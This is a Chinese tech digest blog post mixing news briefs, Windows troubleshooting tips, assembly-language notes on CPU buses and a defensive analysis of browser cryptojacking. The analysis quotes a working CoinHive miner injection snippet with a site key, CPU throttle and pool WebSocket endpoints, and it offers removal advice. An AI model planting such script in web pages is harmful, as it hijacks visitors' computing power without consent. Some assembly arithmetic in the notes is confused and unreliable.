美文网首页晒晒你的简书钻程序员每天写1000字
Mordy期刊181102:才几个小时iphone就出新漏洞

Mordy期刊181102:才几个小时iphone就出新漏洞

作者: Morby | 来源:发表于2018-11-02 19:05 被阅读17次

    一句话新闻:

    【1】360出席CodeBlue大会 蓝牙、WiFi、汽车都能被花样攻破

    【2】GitHub新官上任三把火

    ● 确保 GitHub 是运营高效社区和团队的最佳场所。

    ● 使 GitHub 可供全球更多开发人员使用。

    ● 可靠性、安全性和性能

    【3】才发布几个小时 iOS 12.1被曝一个新的密码绕过漏洞

    据外媒报道,就在苹果为iOS 12发布了安全补丁几个小时后,iOS狂热爱好者、黑客Jose Rodriguez在iOS 12.1中发现了又一个漏洞,即可以在绕过密码的情况下使用群组FaceTime访问联系人列表。

    【4】香港无人机表演疑遭黑客入侵干扰 超40架坠海




    电脑问题答疑板块:

    WIn10系统软件默认安装c盘后消失看不见问题

    win10系统下c盘,program 文件下

    软件一般为32 或者 64位,但是现在win10系统有些C盘会显示program  x86

    像这种情况的话我们的软件默认安装在这个盘的话可能会造成很多文件消失,但是功能依旧存在!!!

    从文件所在位置可以看到安装目录部分文件,但是返回上一级则会消失(位数不同!!!)

    例如pycharm 默认安装在部分电脑确实会消失(部分新电脑 program 会带有后缀X86)

    解决办法现在并未发现,只能换位置重新安装了


    win10系统报错


    系统,内存条,驱动,逐个排除原因,内存条松动或者氧化也会造成电脑无法开机,电脑关机,把内存条拔下来,用橡皮擦一下,然后再装回去重启。再不行重装系统。


    编程栏目:

    【汇编笔记分享】

    1.存储器被划分成若干个存储单元,每个存储单元从0开始编号,例如一个存储器有

    2.128个存储单元,那么存储单元就是0~127,一个存储单元能存1个Byte ,1个Byte=8个bit

    128个单元可以存储128个字节,128个字节=1024个比特,1字节就是八个二进制

    3.如果是大容器容量,我们一般会以更大的单位来计算,比如 MB GB TB等等

    4.cpu如果要从内存中读取数据,首先要指定存储单元的地址(我们这的地址就相当于存储单元的门派号,0~127)

    5.cpu在读写数据的时候一定要指明,它对哪个器件进行操作,进行哪种操作,是从中读取数据还是写数据

    6.cpu要想进行数据读写,必须和外部器件(标准说法是芯片)

    进行以下三类信息的交互

    (1)存储单元的地址(地址信息)

    (2)器件的选择,读或写的命令(控制信息)

    (3)读或写的数据(数据信息)

    8.cpu从内存中读取数据的过程

    (1)cpu通过地址总线把地址信息发送过去(这里就相当于寄快递先把要寄的地址写上去)

    (2)cpu通过控制线发出内存读命令,选中存储器芯片,并且通知它,将要从中读取信息

    (3)存储器将3号单元中的数8通过数据线送入到CPU

    这里我们看到的就是数据总线传输过来的信息了

    9.写操作与读操作的步骤

    (1.)cpu通过地址总线把地址信息3发出

    (2.)cpu通过控制线发出内存写命令,选中存储器芯片,并通知它,要向其中写入数据

    (3.)cpu通过数据线将数据26送入内存的3号单元

    10.下面是三条总线的理解

    (1)地址总线

    一个cpu有十个地址总线,电子计算机中,一根导线可以传送的稳定状态只有两种,高电平或低电平

    10根导线可以传送10位二进制数据

    而10位二进制可以表示多少个不同的数

    最小是0

    最高是1023 1个字节等于八个二进制位 就相当于 一次性可以找128个内存单元

    寻址能力也是CPU地址总线的宽度,宽度越宽寻址能力越强

    一个cpu有N根总线,则可以说这个CPU的地址总线的宽度是N,这样的CPU最多可以寻找

    2的n次方个内存单元  1个内存单元就是一个字节 

    (2)数据总线

    cpu与内存或者其他器件都是通过数据总线进行传输的。

    同理数据总线宽度决定了cpu与外界传输速度。

    8根数据总线一次可传输8位2进制(也就是一个字节)。 16根数据总线也就是传输16个二进制 两个字节

    一根数据总线相当于一个二进制

    8088cpu数据总线宽度为8

    8086cpu的数据总线宽度为16

    (3)控制总线

    cpu对外部期间都是通过控制总线来进行控制的。这里的控制总线是个总称,控制总线是一些不同控制线的集合。

    有多少根控制总线就意味着cpu提供了对外部器件的多少种控制

    控制总线的宽度决定了cpu对外部期间的控制能力

    前面的内存读写命令都是几根总线

    综合发出的

    读信号输出

    控制线负责由cpu向外传输 读的信号 cpu向该控制线上输出低电平表示将要读取数据

    写信号输出

    控制线负责传输写信号

    11.各个类型的CPU寻址能力

    16根地址总线 寻址能力等于 2的16次方 也就是65536(65536个内存单元 一个内存单元就是一个字节)

    65536/1024=64(KB)

    20根地址总线 1048576/1024=1024 KB =1 MB

    24根地址总线 16777216/1024=16384 KB= 16 MB

    32根地址总线4294967296/1024=4194304 KB=4096 MB=4 GB

    数据总线

    8根  1个字节

    16根 2个字节

    16根 2个字节

    32根 4个字节


    剖析栏目

    网页挖矿分析与防御

    挖矿目前已经成为黑帽子牟利的主要手段,最近上网偶然间发现部分网站被挂马后存在网页挖矿的行为,区别于常规病毒操作系统中挖矿行为,网页主要在网站上挂上恶意的JS脚本,访问该网站即触发挖矿动作。目前很多网页挖矿主要以CoinHive的方式较多,一般挖矿用户以主动方式直接使用C或者其他语言构造的miner客户端进行CPU或GPU计算Hash。前端挖矿用户以被动或主动方式在不知情或知情情况下利用浏览者的CPU或GPU。

    案例分析如下:

    访问恶意网站时CPU飙升,关闭网站后回复正常水平。

    关闭之后:

    0×2源代码分析

    查看网页源代码可发现部分挖矿的代码,经过简单确定非手机浏览器后,即开始挖矿的动作。

    浏览器进程占用了较大的CPU资源:

    查看浏览器进程中,可以在内存地址中发现有挖矿地址的痕迹:

    主要引用的挖矿代码的详细都在引用的JS脚本当中,仅使用70%的CPU资源。

    <#script src="https://coinhive.com/lib/coinhive.min.js">

     var miner = new CoinHive.Anonymous('Jgv7noixIKHmJ7IIhAR9jySAwG3ZU8vt', {throttle: 0.7});

     if (!miner.isMobile() && !miner.didOptOut(14400)) {

     miner.start();

    }

    <#/script>

    Jgv7noixIKHmJ7IIhAR9jySAwG3ZU8vt:CoinHive 当中的钱包地址;throttle:浏览器占用CPU的阈值,调节到合适的阈值时用户会很难注意到浏览器的算力被滥用。coinhive.min.js源码如下:

    挖矿脚本使用WebSocket与矿池进行通信,部分的矿池结点如下:

    wss://ws001.coinhive.com/proxy 

    wss://ws002.coinhive.com/proxy 

    wss://ws003.coinhive.com/proxy 

    wss://ws004.coinhive.com/proxy 

    wss://ws005.coinhive.com/proxy 

    wss://ws006.coinhive.com/proxy 

    wss://ws007.coinhive.com/proxy 

    wss://ws008.coinhive.com/proxy 

    wss://ws009.coinhive.com/proxy 

    wss://ws010.coinhive.com/proxy 

    wss://ws011.coinhive.com/proxy 

    wss://ws012.coinhive.com/proxy

    挖矿脚本允许自动调节线程数目:

    this._throttle=Math.max(0,Math.min(.99,this.params.throttle||0));

    this._stopOnInvalidOptIn=false;

    this._waitingForAuth=false;

    this._selfTestSuccess=false;

    this._verifyThread=null;

    this._autoThreads={

    enabled:!!this.params.autoThreads,

    interval:null,

    adjustAt:null,

    adjustEvery:1e4,

    stats:{}

    };

    this._tab={

    ident:Math.random()*16777215|0,

    mode:CoinHive.IF_EXCLUSIVE_TAB,g

    race:0,

    waitReconnect:0,

    lastPingReceived:0,

    interval:null

    };

    0×3 解决方法:

    1.根据页面后查看网页源代码,搜索有关于CoinHive,Miner等关键字可以快速定位到界面,使用记事本或者网页编辑器删除挖矿的关键代码。

    2.使用目前一切所谓的浏览器进行拦截挖矿代码

    3.访问小电影网站时候多留心自己的CPU性能。


    相关文章

      网友评论

        本文标题:Mordy期刊181102:才几个小时iphone就出新漏洞

        本文链接:https://www.haomeiwen.com/subject/ifgcxqtx.html